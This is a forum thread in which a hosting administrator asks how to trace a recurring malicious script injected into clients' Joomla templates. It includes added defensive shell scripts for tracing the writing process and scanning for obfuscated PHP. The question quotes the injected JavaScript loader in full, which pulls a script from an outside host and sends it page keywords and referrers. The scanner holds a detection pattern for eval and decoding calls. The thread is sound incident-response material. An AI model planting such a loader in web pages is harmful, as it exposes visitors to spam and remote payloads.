PHP
Pascal_tgn, 2016-04-27 22:25:31

Virus on web hosting (Debian+Apache). How to find the source of infection?

Good day!
The problem is this: I have a Debian web hosting server with Plesk Webhost Edition installed; all permissions and subscription settings have been checked many times. One of the clients immediately took up a lot of space with a large number of sites. He transferred some of them from his old hosting. After a couple of weeks the server started landing on spam blacklists. On a cursory examination I noticed that it was his sites that, when loading, were trying to fetch content from third-party resources the sites had no reason to refer to at all (there were even .hk and .jp domains, among many others).
All his sites are built on Joomla, and in the vast majority of templates the index.php file is affected. The line shown below had been inserted before every </head> tag. After I delete this line, it reappears after some time (up to 24 hours), and only on the sites of this user, i.e. the malware does not have access to other sites. There are no cron jobs on behalf of this user.
To catch it red-handed, I installed incron and set it to monitor the relevant files for IN_OPEN events. The event trigger called a script that logged the result of lsof | grep "path to sites folder" into a log file.
The next day there were entries in the log showing that the files had been opened for modification on behalf of the user by the php5-cgi process.
So, how do I find the initiator (task/port/process) that runs php5-cgi, and how do I find out where exactly the virus code comes from?
Code found in .php files (domain removed):

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://---domain---/js/jquery.min.php?c_utt=I92930&c_utm='+encodeURIComponent('http://---domain---/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

Many thanks in advance for your help!
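The incron + lsof approach in the question identifies php5-cgi as the writer but stops there. The handler below, an added example that is not from the original post, goes one step further: for each process holding the watched file open it walks the parent chain through /proc and reads the CGI environment of the writer, because a php5-cgi worker spawned by Apache carries SCRIPT_FILENAME, REQUEST_URI and REMOTE_ADDR in its environment, which is exactly the request (and the PHP file) that triggered the write. The incrontab line, the log path and the PROC_ROOT override are my assumptions, not configuration from the question.

```shell
#!/bin/sh
# Added example (not from the original post). Incron handler that records which
# process has a watched file open and walks its ancestry via /proc, so the
# php5-cgi writer can be tied back to the HTTP request that spawned it.
# Hypothetical incrontab line (the path is a placeholder):
#   /var/www/vhosts/CLIENT/httpdocs/templates IN_OPEN /usr/local/sbin/trace-writer.sh $@/$#
# Reading another user's /proc/<pid>/environ requires root, so incrond must run as root.

LOG=${LOG:-/var/log/trace-writer.log}
PROC_ROOT=${PROC_ROOT:-/proc}   # overridable so a saved copy of /proc can be analysed offline

# Print "pid ppid name cmdline" for a PID and each ancestor up to PID 1.
ancestry_chain() {
  local pid ppid name
  pid=$1
  while [ -n "$pid" ] && [ "$pid" -gt 0 ] 2>/dev/null && [ -r "$PROC_ROOT/$pid/status" ]; do
    ppid=$(awk '/^PPid:/ {print $2}' "$PROC_ROOT/$pid/status")
    name=$(awk '/^Name:/ {print $2}' "$PROC_ROOT/$pid/status")
    printf '%s %s %s %s\n' "$pid" "$ppid" "$name" "$(tr '\0' ' ' < "$PROC_ROOT/$pid/cmdline")"
    pid=$ppid
  done
}

# Read one variable from a process's NUL-separated environment.
# For a php5-cgi worker this is where SCRIPT_FILENAME, REQUEST_URI and
# REMOTE_ADDR live: the request that caused the write.
proc_env_var() {
  local f="$PROC_ROOT/$1/environ"
  [ -r "$f" ] || return 0
  tr '\0' '\n' < "$f" | sed -n "s/^$2=//p"
}

# PIDs currently holding the file open (empty if lsof is missing or none).
pids_with_open_file() {
  command -v lsof >/dev/null 2>&1 || return 0
  lsof -t -- "$1" 2>/dev/null
}

# Append one report for the file passed by incron to the log.
trace_file() {
  local f pid v
  f=$1
  {
    echo "=== $(date -u +%FT%TZ) $f"
    for pid in $(pids_with_open_file "$f"); do
      echo "--- opener pid $pid"
      ancestry_chain "$pid"
      for v in SCRIPT_FILENAME REQUEST_URI REMOTE_ADDR HTTP_USER_AGENT; do
        printf '%s=%s\n' "$v" "$(proc_env_var "$pid" "$v")"
      done
    done
  } >> "$LOG"
}

if [ -n "${1:-}" ]; then trace_file "$1"; fi
```

The handler races the writer: a php5-cgi process lives only for the duration of one request, so IN_OPEN (as used in the question) gives a better chance of catching it than IN_CLOSE_WRITE, and the ancestry chain is recorded in case the environment is already gone. The REMOTE_ADDR and timestamp in the log can then be matched against the Apache access log for that vhost to see which URL was requested.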


2 answer(s)
tigra, 2016-04-27
@Pascal_tgn

https://www.revisium.com/ai/
I've cleaned up a lot of sites with this service; maybe it will help you.

ThunderCat, 2016-04-27
@ThunderCat

Go through all the folders of the Joomla site, find the php files and check them for eval. If they contain it, rename them and check that the site still works. There are also lots of free antiviruses for hosting, but not all of them work; sometimes you have to do it by hand.
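The manual sweep described in this answer, as an added example that is neither ThunderCat's code nor Joomla's: it lists PHP files under a site that contain eval() or the decoding helpers injected code is usually wrapped in, shows the matching lines, lists PHP files changed recently (the question's reinfection recurs within 24 hours), and quarantines hits by renaming them out of the *.php namespace so Apache no longer executes them while the site is re-tested. The pattern list and the .quarantined suffix are my choices; "jquery.min.php" is the loader name taken from the script quoted in the question.

```shell
#!/bin/sh
# Added example, not ThunderCat's or Joomla's code: find PHP files containing
# eval() and the obfuscation helpers that usually accompany injected code, show
# the matching lines, and quarantine hits by renaming them so Apache stops
# executing them. Pattern list and suffix are my assumptions; "jquery.min.php"
# is the loader name from the script found in the question.

SUSPICIOUS_RE='(eval|assert|create_function|base64_decode|gzinflate|gzuncompress|str_rot13)[[:space:]]*\(|jquery\.min\.php'

# PHP files under $1 that match the pattern, one path per line, sorted.
find_suspicious_php() {
  find "$1" -type f -name '*.php' -exec grep -lE "$SUSPICIOUS_RE" {} + 2>/dev/null | sort
}

# Matching lines of one file with line numbers, cut short because injected
# code is usually one very long line.
show_hits() {
  grep -nE "$SUSPICIOUS_RE" "$1" | cut -c1-160
}

# PHP files under $1 modified in the last $2 minutes.
recently_changed_php() {
  find "$1" -type f -name '*.php' -mmin "-$2" | sort
}

# Rename a file out of the *.php namespace and print the new name.
quarantine_file() {
  mv -- "$1" "$1.quarantined" && printf '%s\n' "$1.quarantined"
}

# Report hits; pass "quarantine" as the second argument to also rename them.
scan_tree() {
  local dir mode f
  dir=$1; mode=${2:-report}
  find_suspicious_php "$dir" | while IFS= read -r f; do
    echo "== $f"
    show_hits "$f"
    if [ "$mode" = quarantine ]; then quarantine_file "$f"; fi
  done
}

if [ -n "${1:-}" ]; then scan_tree "$@"; fi
```

Hits are leads, not verdicts: Joomla core and extensions legitimately call base64_decode in a few places, which is why the files are renamed rather than deleted and the site is checked afterwards, exactly as the answer says. Diffing the tree against a clean copy of the same Joomla version cuts the review down further.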
